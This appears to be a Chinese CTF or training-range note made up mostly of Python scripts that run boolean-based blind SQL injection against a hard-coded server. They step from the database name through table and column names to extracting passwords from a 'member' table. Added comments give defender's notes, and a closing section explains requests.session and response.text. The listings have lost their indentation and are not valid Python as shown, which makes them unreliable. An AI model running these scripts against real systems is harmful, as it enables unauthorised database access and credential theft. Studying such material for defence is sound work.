数据库长度
# Boolean-based blind SQL injection probe: guesses the length of the current
# database name by appending `length(database())=i` to the `id` query
# parameter and checking whether a fixed marker string appears in the body.
# NOTE(review): the listing's indentation was lost in extraction; as pasted
# the `for`/`if` bodies are not valid Python.
# Defender's view: server-side this is a burst of GETs to one endpoint whose
# `id` value carries SQL syntax (`and`, `length(`, `database()`); a
# parameterised query for `id` removes the oracle this loop depends on.
# Wildcard import: pulls `session`, `get` and every other public requests name
# into module scope.
from requests import *
# One Session reused for all probes, so cookies/headers persist between them.
r=session()
# Hard-coded target; the SQL fragment is sent as part of the `id` parameter,
# with the spaces left unencoded in the string.
url = 'http://124.70.71.251:40332/new_list.php?id=1 and length(database())='
# Candidate lengths 0..19 are all tried; there is no `break`, so all 20
# requests are sent regardless of when a match occurs.
for i in range(20):
url1=url+str(i)
# `re` holds the requests.Response; the name shadows the stdlib `re` module
# (not imported here) and is misleading.
re=r.get(url1)
# Truth oracle: presumably the page shows "2018" only when the injected
# condition is true -- cannot be confirmed from this file.
if "2018" in re.text:
print(i)
数据库名称
# Boolean-based blind SQL injection probe: recovers the current database name
# one character at a time by testing `ascii(substr(database(),i,1))=j` for
# each position i and each printable ASCII code j.
# NOTE(review): the listing's indentation was lost in extraction; as pasted
# the nested loop bodies are not valid Python.
# Defender's view: up to 10*80 near-identical GETs to one endpoint, each
# differing only in the numeric comparison inside the `id` parameter; rate
# limiting and parameterised queries both neutralise this pattern.
from requests import *
# Single Session reused for every probe.
r=session()
# Hard-coded target; the injected condition is concatenated onto `id=1 and `.
url = 'http://124.70.71.251:40545/new_list.php?id=1 and '
# Positions 0..9 of the name.
for i in range(10):
# ASCII codes 48..127 (digits, letters, punctuation).
for j in range(48,128):
# `--+` ends the payload: after URL decoding the `+` is a space, so the rest
# of the original query is presumably treated as an SQL comment.
payload=url+'ascii(substr(database(),'+str(i)+',1))='+str(j)+"--+"
# `re` is the Response object; the name shadows the stdlib `re` module.
re=r.get(payload)
# Marker-string oracle: presumably "2018" is present only when the injected
# condition holds -- not verifiable from this file.
if "2018" in re.text:
# No `break`: every remaining j is still tried after a hit.
print(chr(j),end='')
数据库表数量
# Boolean-based blind SQL injection probe: guesses how many tables the schema
# 'stormgroup' has by comparing a `count(table_name)` subquery on
# information_schema.tables against each i in 0..19.
# NOTE(review): the listing's indentation was lost in extraction; as pasted
# the `for`/`if` bodies are not valid Python.
# Defender's view: references to `information_schema` inside a numeric `id`
# parameter are a high-signal detection string; the underlying fix is a
# parameterised query.
from requests import *
# Single Session reused for every probe.
r = session()
# Hard-coded target; the injected condition is concatenated onto `id=1 and `.
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(20):
# `--+` (a `+` decodes to a space) presumably comments out the rest of the
# original query.
payload = url + "(select count(table_name) from information_schema.tables where table_schema='stormgroup')=" + str(i) + "--+"
# `re` is the Response object; the name shadows the stdlib `re` module.
re = r.get(payload)
# Marker-string oracle; no `break`, so all 20 requests are always sent.
if '2018' in re.text:
print(i)
数据库表名
# Boolean-based blind SQL injection probe: guesses the length of each of the
# first two table names in schema 'stormgroup' (`limit j,1`, j = 0, 1) by
# comparing `length(...)` against i in 0..19.
# NOTE(review): the listing's indentation was lost in extraction; as pasted
# the nested loop bodies are not valid Python.
# Defender's view: `information_schema.tables` inside a numeric `id` value is
# a high-signal detection string; parameterised queries remove the oracle.
from requests import *
# Single Session reused for every probe.
r = session()
# Hard-coded target; the injected condition is concatenated onto `id=1 and `.
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
# Outer loop is the candidate length, inner loop the table index, so the
# printed lengths come out ordered by length, not by table.
for i in range(20):
for j in range(2):
# `--+` (a `+` decodes to a space) presumably comments out the rest of the
# original query.
payload = url + "length((select table_name from information_schema.tables where table_schema='stormgroup' limit " + str(j) + ",1))=" + str(i) + "--+"
# `re` is the Response object; the name shadows the stdlib `re` module.
re = r.get(payload)
# Marker-string oracle; only i is printed, so the output does not say which
# table (j) a length belongs to.
if "2018" in re.text:
print(i)
字段数量
# Boolean-based blind SQL injection probe: guesses the number of columns in
# table 'member' of schema 'stormgroup' via a `count(column_name)` subquery on
# information_schema.columns, compared against i in 0..9.
# NOTE(review): the listing's indentation was lost in extraction; as pasted
# the `for`/`if` bodies are not valid Python.
# Defender's view: `information_schema.columns` inside a numeric `id` value is
# a high-signal detection string; parameterised queries remove the oracle.
from requests import *
# Single Session reused for every probe.
r=session()
# Hard-coded target; the injected condition is concatenated onto `id=1 and `.
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(10):
# Here the terminator is written " --+" (leading space), unlike the "--+"
# used in the sibling scripts; both presumably end the original query.
payload=url+"(select count(column_name) from information_schema.columns where table_schema='stormgroup' and table_name='member')="+str(i)+" --+"
# `re` is the Response object; the name shadows the stdlib `re` module.
re=r.get(payload)
# Marker-string oracle; no `break`, so all 10 requests are always sent.
if "2018" in re.text:
print(i)
字段名
# Boolean-based blind SQL injection probe: recovers the names of the first
# three columns of table 'member' (k = 0..2 via `limit k,1`), one character
# per position j (0..9), by testing `ascii(substr(...,j,1))=i` for i in
# 47..127.
# NOTE(review): the listing's indentation was lost in extraction; as pasted
# the nested loop bodies are not valid Python, and it is not recoverable
# from this file which loop the final `print("\n")` belongs to.
# Defender's view: up to 3*10*81 GETs to one endpoint differing only in small
# integers inside the `id` parameter -- a rate-limit and WAF-friendly pattern;
# the root fix is a parameterised query.
from requests import *
# Single Session reused for every probe.
r = session()
# Hard-coded target; the injected condition is concatenated onto `id=1 and `.
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for k in range(3):
for j in range(10):
# Note: this range starts at 47 ('/'), the sibling scripts start at 48 ('0').
for i in range(47, 128):
# One statement split over two physical lines inside the `str(` call; the
# `--+` terminator presumably comments out the rest of the original query.
# This subquery has no `table_schema` filter, unlike the count query above.
payload = url + "ascii(substr((select column_name from information_schema.columns where table_name='member' limit "+str(k)+",1)," + str(
j) + ",1))=" + str(i) + "--+"
# `re` is the Response object; the name shadows the stdlib `re` module.
re = r.get(payload)
# Marker-string oracle; no `break`, so every i is tried even after a hit.
if "2018" in re.text:
print(chr(i), end="")
# print() adds its own newline, so this emits a blank line, not just a break.
print("\n")
爆破表中密码
# Boolean-based blind SQL injection probe: reads the `password` column of
# table 'member' for the first three rows (i = 0..2 via `limit i,1`), one
# character per position j (0..49), testing `ascii(substr(...,j,1))=k` for
# k in 48..127.
# NOTE(review): the listing's indentation was lost in extraction; as pasted
# the nested loop bodies are not valid Python, and it is not recoverable
# from this file which loop the final `print("\n")` belongs to.
# Defender's view: this is the data-exfiltration stage of the same oracle --
# up to 3*50*80 GETs; it also shows why stored credentials should be hashed
# with a slow, salted algorithm rather than kept in a plainly readable column.
from requests import *
# Single Session reused for every probe.
r=session()
# Hard-coded target; the injected condition is concatenated onto `id=1 and `.
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(3):
for j in range(50):
for k in range(48, 128):
# " --+" terminator (leading space) presumably comments out the rest of the
# original query.
payload = url + "ascii(substr((select password from member limit "+str(i)+",1)," + str(j) + ",1))=" + str(k) + " --+"
# `re` is the Response object; the name shadows the stdlib `re` module.
re = r.get(payload)
# Marker-string oracle; no `break`, so every k is tried even after a hit.
if "2018" in re.text:
print(chr(k), end="")
# print() adds its own newline, so this emits a blank line, not just a break.
print("\n")
对一些代码做一下解释:
r=session():它的作用是创建一个新的会话对象,该对象可以用于管理与远程服务器之间的连接和请求。通过使用会话对象,你可以保持一些状态信息,例如cookies、headers等,以便在不同的请求之间共享。
re.text：直接输出 re 对象只会显示该对象的默认字符串表示形式，通常是一个包含响应状态信息的简短字符串（见下例）。这个字符串对于了解响应的整体情况可能有帮助，但如果你只关心响应的主体内容，那么使用 re.text 会更加方便和直观。
比如:
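# Minimal example: fetch a page and print the Response object itself.
# Printing the Response shows only its summary representation (for a
# successful request, `<Response [200]>`); the body is in `response.text`.
import requests

url = 'https://www.example.com'
# requests.get() has no default timeout and would wait indefinitely on a
# silent server, so always pass one.
response = requests.get(url, timeout=10)
print(response)
# Output:
# <Response [200]>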